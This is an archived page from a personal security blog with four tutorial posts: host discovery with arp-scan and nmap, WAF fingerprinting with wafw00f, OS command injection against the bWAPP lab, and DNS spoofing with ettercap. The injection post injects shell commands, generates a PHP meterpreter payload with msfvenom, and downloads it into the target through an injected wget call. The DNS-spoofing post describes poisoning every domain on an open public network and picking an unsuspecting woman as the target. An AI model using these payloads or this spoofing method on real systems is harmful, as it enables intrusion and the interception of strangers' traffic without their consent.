Ocak 2018

Home » Archives for Ocak 2018

10 Ocak 2018 Çarşamba

Local Network Discovery Studies (Lokal Ağda Keşif Çalışmaları)

   Ocak 10, 2018      



Hello everyone.

Today I will write about Local Network Discovery Studies

What Is This Ifconfig?

ifconfig is a system administration utility in Unix-like operating systems for network interface configuration.

The utility is a command line interface tool and is also used in the system startup scripts of many operating systems.

It has features for configuring, controlling, and querying TCP/IP network interface parameters. Ifconfig originally appeared in 4.2BSD as part of the BSD TCP/IP suite. (Wikipedia)


What Is ARP-Ping

Arping is a computer software tool for discovering and probing hosts on a computer network.

Arping probes hosts on the attached network link by sending Link Layer frames using the Address Resolution Protocol (ARP) request method addressed to a host identified by its MAC address of the network interface.

The utility program may use ARP to resolve an IP address provided by the user.

ARP-SCAN Usage And Install

 Command 

ARCH Linux = sudo pacman -S arp-scan

debian = sudo apt-get install arp-scan

 

 

Usage  

Command 

arp-scan -I "interface" -l

 NMAP For Local Scan

My ip address 192.168.1.102

Command

nmap -T4 -Pn 192.168.1.0/24

-T4 = This paremeter is suitable for networks that you know or up 

-Pn = icmp scans for paused machines without ping 

If root user is scanning, SYN connect will be used. 
If you are not root user, the scan will be a connect scan

















Thank you for reading



   / / / /

   No Comments

- Ocak 10, 2018 0 yorum

8 Ocak 2018 Pazartesi

Firewall Detection in Penetration Tests (Sızma Testlerinde Firewall Tespiti)

   Ocak 08, 2018      



Hello everyone.

Today  I will write about Firewall detection in penetration testing.
Please let me know your views on the articles

E-Mail = berkdusunurx@gmail.com
Twitter = @berkdusunur

What Is This Firewall ?


In computing, a firewall is a network security system that monitors and controls incoming and outgoing network traffic based on predetermined security rules.[1] A firewall typically establishes a barrier between a trusted internal network and untrusted external network, such as the Internet.[2]
Firewalls are often categorized as either network firewalls or host-based firewalls. Network firewalls filter traffic between two or more networks and run on network hardware. Host-based firewalls run on host computers and control network traffic in and out of those machines. (Wikipedia)

WAFW00F

WAFW00F identifies and fingerprints Web Application Firewall (WAF) products.

How does it work?

To do its magic, WAFW00F does the following:
  • Sends a normal HTTP request and analyses the response; this identifies a number of WAF solutions
  • If that is not successful, it sends a number of (potentially malicious) HTTP requests and uses simple logic to deduce which WAF it is
  • If that is also not successful, it analyses the responses previously returned and uses another simple algorithm to guess if a WAF or security solution is actively responding to our attacks
For further details, check out the source code on the main site,   github.com/sandrogauci/wafw00f.

Install And Usage  

We take the vehicle from the github repo

Code 

git clone https://github.com/EnableSecurity/wafw00f.git
 



Ok cloned directory

Code 

 1- cd wafw00f
2- ls
3- chmod +x setup.py
4- python setup.py install


Installed in required packages

First Scan

Code

wafw00f www.berkdusunur.net

He made 15 requests but could not detect an firewall


Code

wafw00f canyoupwn.me 

 Found CloudFlare IDS

 

Code

 wafw00f twitter.com

 

 

Similar tools 

Waf-Detector

This is a simple package for Web Application Firewall Detection. It supports CloudFlare, Incapsula, ModSecurity, and Shieldfy out of the box.

Instal
 
git clone https://github.com/shieldfy/waf-detector.git




Install Composer

For ARCH Linux = pacman -S composer

For debian = apt-get install composer


Code

composer require shieldfy/waf-detector















We will bypass many firewall systems including CloudFlare in my next article



Thank You For Reading 



Stay in Follow
















                              
                            


                                /
                              


                                /
                              


                                /
                              


                                /
                              


                                /
                              


                                /
                              


                                /
                              






                              
                            

                                1 Comment
                              












-


Ocak 08, 2018






                                    1
                                    yorum



















                          

                        

                        

                      



2 Ocak 2018 Salı




                        

                      














OS Command Injection Unauthorized Access






                            
                          Ocak 02, 2018
                            
                          
                            
                          















Hello Everyone :)





                

bWAPP



            bWAPP, or a buggy web application, is a free and open source deliberately insecure web application.



bWAPP helps security enthusiasts, developers and students to discover 
and to prevent web vulnerabilities. bWAPP prepares one to conduct 
successful penetration testing and ethical hacking projects. What makes 
bWAPP so unique? Well, it has over 100 web bugs! It covers all major 
known web vulnerabilities, including all risks from the OWASP Top 10 
project. The focus is not just on one specific issue... bWAPP is 
covering a wide range of vulnerabilities!



bWAPP is a PHP application that uses a MySQL database. It can be hosted 
on Linux/Windows with Apache/IIS and MySQL. It is supported on WAMP or 
XAMPP. Another possibility is to download bee-box, a custom VM 
pre-installed with bWAPP.



This project is part of the ITSEC GAMES project. You can find more about the ITSEC GAMES and bWAPP projects on our blog.



For security-testing and educational purposes only!









 



 Os Command Injection

Command injection is an attack in which the goal is execution of 
arbitrary commands on the host operating system via a vulnerable 
application. Command injection attacks are possible when an application 
passes unsafe user supplied data (forms, cookies, HTTP headers etc.) to a
 system shell.



 In this attack, the attacker-supplied operating system 
commands are usually executed with the privileges of the vulnerable 
application. Command injection attacks are possible largely due to 
insufficient input validation.



This attack differs from Code Injection, in that code injection allows the attacker to add his own code that is then executed by the application. In Code Injection, the attacker extends the default functionality of the application without the necessity of executing system commands.







Code    ;ls 











Code ;pwd 











Code ;whoami











Using the MSFvenom Command Line Interface

Msfvenom is a combination of Msfpayload and Msfencode,
 putting both of these tools into a single Framework instance.



Msfvenom 
replaced both msfpayload and msfencode as of June 8th, 2015.


The advantages of msfvenom are:



    

  • One single tool
    • 

  • Standardized command line options
    • 

  • Increased speed 
    • 




MSFVENOM PHP PAYLOAD  



Code



msfvenom -p php/meterpreter/bind_tcp LHOST=ipaddress LPORT=4448 > berkdusunur.php











Code ;wget http://ip.add.re.ss/berkdusunur.php













And Meterpreter :)













Thank You For Reading 





You can follow  us on twitter @berkdusunur













                              
                            


                                /
                              


                                /
                              


                                /
                              


                                /
                              


                                /
                              


                                /
                              






                              
                            

                                No Comments
                              












-


Ocak 02, 2018





0
yorum



















                          

                        

                        

                      



1 Ocak 2018 Pazartesi




                        

                      














DNS Spoofing (DNS Zehirlenmesi)






                            
                          Ocak 01, 2018
                            
                          
                            
                          













Hello everyone :)



I'm going to do a dns poisoning scenario today.  I want to do DNS spoofing in an open and free network.



 Okay lets start :)

You can follow us on twitter @berkdusunur



Attacker ip address









We will use the tool ettercap. We first need to make some configurations.

First I will start from the file etter.dns If desired, a single domain name or all domain  names can be attacked.



/etc/ettercap/etter.dns









I'm doing an attack on all domain names with;



*                        A                         192.168.1.107



I save and exit .  



Afterrr 

Then open the etter.conf file and enable redirects for linux.  I deleted "#" for iptables



/etc/ettercap/etter.conf 













Then I activate my Apache servise.



 service apache2 start 









Then I open the EtterCap tool and enter the necessary parametres. 









Sniff >  Unified sniffing









My interface wlan0









Hosts >  Scan For Hosts > Host List 



Gateway add to target one beatiful girl add to target 2 :)



Then mitmf > arp poisoning > snif remote poisoning 



plugins > Manage the plugin > DNS_Spoof















Okay Start and Start Snifing :) 






























                              
                            


                                /
                              


                                /
                              


                                /
                              


                                /
                              


                                /
                              






                              
                            

                                No Comments
                              












-


Ocak 01, 2018





0
yorum



















                      

                    












Kaydol:

Kayıtlar
                      (
                      Atom
                      )